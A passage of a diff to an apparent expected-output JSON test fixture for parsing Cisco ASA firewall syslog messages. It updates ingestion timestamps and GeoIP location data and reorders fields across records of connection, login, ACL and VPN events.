"302022", "kind": "event", @@ -2582,7 +2582,7 @@ "severity": 6, "duration": 0, "reason": "Cluster flow with CLU closed on owner", - "ingested": "2021-12-09T13:31:25.163049Z", + "ingested": "2021-12-14T14:36:13.057644110Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner", "code": "302023", "kind": "event", @@ -2661,7 +2661,7 @@ "severity": 6, "duration": 0, "reason": "Forwarding or redirect flow removed to create director or backup flow", - "ingested": "2021-12-09T13:31:25.163053700Z", + "ingested": "2021-12-14T14:36:13.057644480Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "code": "302023", "kind": "event", @@ -2712,7 +2712,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.163059400Z", + "ingested": "2021-12-14T14:36:13.057644837Z", "original": "May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief", "code": "111009", "kind": "event", @@ -2763,7 +2763,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.163065900Z", + "ingested": "2021-12-14T14:36:13.057645193Z", "original": "May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list aaa_out brief", "code": "111009", "kind": "event", @@ -2839,7 +2839,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163072400Z", + "ingested": "2021-12-14T14:36:13.057645554Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -\u003e fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2916,7 +2916,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163078900Z", + "ingested": "2021-12-14T14:36:13.057645905Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -\u003e fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2962,7 +2962,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163085500Z", + "ingested": "2021-12-14T14:36:13.057646262Z", "original": "May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner", "code": "302027", "kind": "event", @@ -3005,7 +3005,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163091900Z", + "ingested": "2021-12-14T14:36:13.057646638Z", "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144)", "code": "302026", "kind": "event", @@ -3074,7 +3074,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.163098400Z", + "ingested": "2021-12-14T14:36:13.057646992Z", "original": "May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985", "code": "710005", "kind": "event", @@ -3118,7 +3118,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163104800Z", + "ingested": "2021-12-14T14:36:13.057647348Z", "original": "May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout", "code": "302025", "kind": "event", @@ -3161,7 +3161,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163111300Z", + "ingested": "2021-12-14T14:36:13.057647704Z", "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123)", "code": "302024", "kind": "event", @@ -3233,7 +3233,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:25.163117800Z", + "ingested": "2021-12-14T14:36:13.057648068Z", "original": "May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)", "code": "106014", "kind": "event", @@ -3278,7 +3278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163124200Z", + "ingested": "2021-12-14T14:36:13.057648427Z", "original": "May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063", "code": "733100", "kind": "event", @@ -3361,7 +3361,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:25.163130700Z", + "ingested": "2021-12-14T14:36:13.057648780Z", "original": "May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2", "code": "106010", "kind": "event", @@ -3437,7 +3437,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163137100Z", + "ingested": "2021-12-14T14:36:13.057649137Z", "original": "May 5 19:02:25 dev01: %ASA-4-507003: tcp flow from fw111:10.10.10.10/49574 to out111:192.168.2.2/80 terminated by inspection engine, reason - disconnected, dropped packet.", "code": "507003", "kind": "event", @@ -3500,7 +3500,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163143800Z", + "ingested": "2021-12-14T14:36:13.057649999Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3562,7 +3562,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163150300Z", + "ingested": "2021-12-14T14:36:13.057650412Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]", "code": "304001", "kind": "event", @@ -3624,7 +3624,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163155200Z", + "ingested": "2021-12-14T14:36:13.057650767Z", "original": "Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23", "code": "304001", "kind": "event", @@ -3686,7 +3686,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163160400Z", + "ingested": "2021-12-14T14:36:13.057651143Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3711,20 +3711,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -3734,20 +3728,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -3797,7 +3785,7 @@ "severity": 6, "duration": 3602000000000, "reason": "Connection timeout", - "ingested": "2021-12-09T13:31:25.163166600Z", + "ingested": "2021-12-14T14:36:13.057651499Z", "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "code": "302304", "kind": "event", @@ -3875,7 +3863,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163172300Z", + "ingested": "2021-12-14T14:36:13.057651851Z", "original": "Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group \"global_access_1\"", "code": "106023", "kind": "event", @@ -3952,7 +3940,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163176700Z", + "ingested": "2021-12-14T14:36:13.057652218Z", "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -3975,16 +3963,6 @@ } }, { - "log": { - "level": "notification" - }, - "source": { - "address": "console", - "domain": "console" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4001,12 +3979,19 @@ "console" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "console", + "domain": "console" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163182Z", + "ingested": "2021-12-14T14:36:13.057652571Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK", "code": "111004", "kind": "event", @@ -4022,19 +4007,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4056,15 +4034,22 @@ "10.10.0.87" ] }, + "log": { + "level": "notification" + }, "host": { "user": { "name": "enable_15" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163188600Z", + "ingested": "2021-12-14T14:36:13.057652923Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear'", "code": "111010", "kind": "event", @@ -4080,7 +4065,10 @@ "asa": { "command_line_arguments": "'clear'" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -4112,7 +4100,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163193300Z", + "ingested": "2021-12-14T14:36:13.057653274Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15", "code": "502103", "kind": "event", @@ -4190,7 +4178,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163198100Z", + "ingested": "2021-12-14T14:36:13.057653640Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD-FS-LAN:10.10.1.254/https for user \"*****\"", "code": "605004", "kind": "event", @@ -4211,16 +4199,6 @@ } }, { - "log": { - "level": "informational" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4242,15 +4220,22 @@ "10.10.0.87" ] }, + "log": { + "level": "informational" + }, "host": { "user": { "name": "admin" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163202100Z", + "ingested": "2021-12-14T14:36:13.057653993Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin", "code": "611102", "kind": "event", @@ -4265,7 +4250,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4321,7 +4309,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163207200Z", + "ingested": "2021-12-14T14:36:13.057654354Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user \"admin\"", "code": "605005", "kind": "event", @@ -4342,16 +4330,6 @@ } }, { - "log": { - "level": "informational" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4373,15 +4351,22 @@ "10.10.0.87" ] }, + "log": { + "level": "informational" + }, "host": { "user": { "name": "admin" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163212600Z", + "ingested": "2021-12-14T14:36:13.057654733Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin", "code": "611101", "kind": "event", @@ -4396,37 +4381,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4445,12 +4405,31 @@ "81.2.69.144" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163218400Z", + "ingested": "2021-12-14T14:36:13.057655087Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", "code": "713049", "kind": "event", @@ -4464,7 +4443,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4473,20 +4455,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4529,7 +4505,7 @@ "event": { "severity": 4, "duration": 0, - "ingested": "2021-12-09T13:31:25.163225Z", + "ingested": "2021-12-14T14:36:13.057655452Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "code": "113019", "kind": "event", @@ -4548,19 +4524,6 @@ } }, { - "log": { - "level": "warning" - }, - "source": { - "user": { - "name": "john" - }, - "address": "192.168.50.3", - "ip": "192.168.50.3" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4582,12 +4545,22 @@ "192.168.50.3" ] }, + "log": { + "level": "warning" + }, "host": { "hostname": "dev01" }, + "source": { + "user": { + "name": "john" + }, + "address": "192.168.50.3", + "ip": "192.168.50.3" + }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163231500Z", + "ingested": "2021-12-14T14:36:13.057655837Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-722051: Group \u003cVPN5Policy\u003e User \u003cjohn\u003e IP \u003c192.168.50.3\u003e IPv4 Address \u003c192.168.50.5\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", @@ -4606,40 +4579,12 @@ }, "assigned_ip": "192.168.50.5" } - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "user": { - "name": "testuser" - }, - "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4661,13 +4606,35 @@ "81.2.69.144" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "user": { + "name": "testuser" + }, + "ip": "81.2.69.144" + }, "event": { "severity": 6, "reason": "User Requested", - "ingested": "2021-12-09T13:31:25.163236500Z", + "ingested": "2021-12-14T14:36:13.057656196Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.", "code": "716002", "kind": "event", @@ -4685,22 +4652,12 @@ "group_name": "another-policy" } } - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "user": { - "name": "alice" - }, - "address": "192.168.50.1", - "ip": "192.168.50.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4722,13 +4679,23 @@ "192.168.50.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "user": { + "name": "alice" + }, + "address": "192.168.50.1", + "ip": "192.168.50.1" + }, "event": { "severity": 6, "reason": "Idle timeout", - "ingested": "2021-12-09T13:31:25.163241700Z", + "ingested": "2021-12-14T14:36:13.057656555Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", "code": "716002", "kind": "event", @@ -4746,7 +4713,10 @@ "group_name": "another-policy" } } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4760,20 +4730,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4816,7 +4780,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:25.163248200Z", + "ingested": "2021-12-14T14:36:13.057656978Z", "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23", "code": "710003", "kind": "event", @@ -4848,20 +4812,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4908,7 +4866,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163253900Z", + "ingested": "2021-12-14T14:36:13.057657339Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally", "code": "434004", "kind": "event", @@ -4941,20 +4899,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5002,7 +4954,7 @@ "event": { "severity": 4, "action": "drop", - "ingested": "2021-12-09T13:31:25.163259500Z", + "ingested": "2021-12-14T14:36:13.057657709Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "code": "434002", "outcome": "unknown" @@ -5026,20 +4978,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5082,7 +5028,7 @@ "event": { "severity": 6, "reason": "Failed to locate egress interface", - "ingested": "2021-12-09T13:31:25.163263900Z", + "ingested": "2021-12-14T14:36:13.057658068Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412", "code": "110002", "kind": "event", @@ -5114,20 +5060,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5175,7 +5115,7 @@ "event": { "severity": 4, "reason": "Duplicate TCP SYN with different initial sequence number", - "ingested": "2021-12-09T13:31:25.163269600Z", + "ingested": "2021-12-14T14:36:13.057658422Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", "code": "419002", "kind": "event", @@ -5205,20 +5145,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5260,7 +5194,7 @@ "event": { "severity": 6, "action": "created", - "ingested": "2021-12-09T13:31:25.163275700Z", + "ingested": "2021-12-14T14:36:13.057658891Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "code": "602303", "outcome": "success" @@ -5283,20 +5217,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5337,7 +5265,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163281300Z", + "ingested": "2021-12-14T14:36:13.057659247Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.", "code": "602304", "kind": "event", @@ -5372,20 +5300,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5423,7 +5345,7 @@ "event": { "severity": 5, "reason": "Received a IKE_INIT_SA request", - "ingested": "2021-12-09T13:31:25.163287900Z", + "ingested": "2021-12-14T14:36:13.057659621Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", "code": "750002", "kind": "event", @@ -5455,20 +5377,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5506,7 +5422,7 @@ "event": { "severity": 4, "reason": "Negotiation aborted due to Failed to locate an item in the database", - "ingested": "2021-12-09T13:31:25.163292700Z", + "ingested": "2021-12-14T14:36:13.057659977Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", "code": "750003", "kind": "event", @@ -5526,16 +5442,6 @@ } }, { - "log": { - "level": "notification" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -5554,13 +5460,20 @@ "192.168.1.1" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 5, "reason": "PHASE 2 COMPLETED", - "ingested": "2021-12-09T13:31:25.163296900Z", + "ingested": "2021-12-14T14:36:13.057660341Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", "code": "713120", "kind": "event", @@ -5577,19 +5490,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "address": "192.168.157.61", - "ip": "192.168.157.61" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -5608,13 +5514,20 @@ "192.168.157.61" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.157.61", + "ip": "192.168.157.61" + }, "event": { "severity": 5, "reason": "Duplicate first packet detected", - "ingested": "2021-12-09T13:31:25.163341Z", + "ingested": "2021-12-14T14:36:13.057660704Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.", "code": "713202", "kind": "event", @@ -5628,19 +5541,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -5659,13 +5565,20 @@ "192.168.1.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:31:25.163350100Z", + "ingested": "2021-12-14T14:36:13.057661066Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713905", "kind": "event", @@ -5681,7 +5594,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -5708,7 +5624,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": 